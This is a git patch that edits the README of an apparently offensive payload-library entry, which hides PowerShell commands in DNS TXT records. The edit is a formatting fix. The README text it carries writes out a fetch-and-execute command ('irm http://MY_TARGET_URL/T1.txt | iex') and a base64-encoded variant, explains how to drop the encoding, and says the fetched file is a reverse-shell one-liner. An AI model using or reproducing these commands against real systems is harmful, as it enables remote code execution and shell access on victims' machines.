From 5ff699caa237b0e979a83227ceeff601759fdc4f Mon Sep 17 00:00:00 2001 From: Nate <101878955+nathansb2022@users.noreply.github.com> Date: Sun, 4 Aug 2024 18:01:43 -0500 Subject: [PATCH] Update README.md fixed formatting --- payloads/library/execution/DNS-TXT-CommandInjection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/README.md b/payloads/library/execution/DNS-TXT-CommandInjection/README.md index 049b620..7ab8070 100644 --- a/payloads/library/execution/DNS-TXT-CommandInjection/README.md +++ b/payloads/library/execution/DNS-TXT-CommandInjection/README.md @@ -17,7 +17,7 @@ Category: Execution Other commands can be added to DNS TXT record rather than the example below. No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRINGLN payload. Examples of the decoded command and encoded command are shown below to put into the DNS TXT record. -Decoded: "irm http://MY_TARGET_URL/T1.txt | iex" +Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"\ Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==" powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)\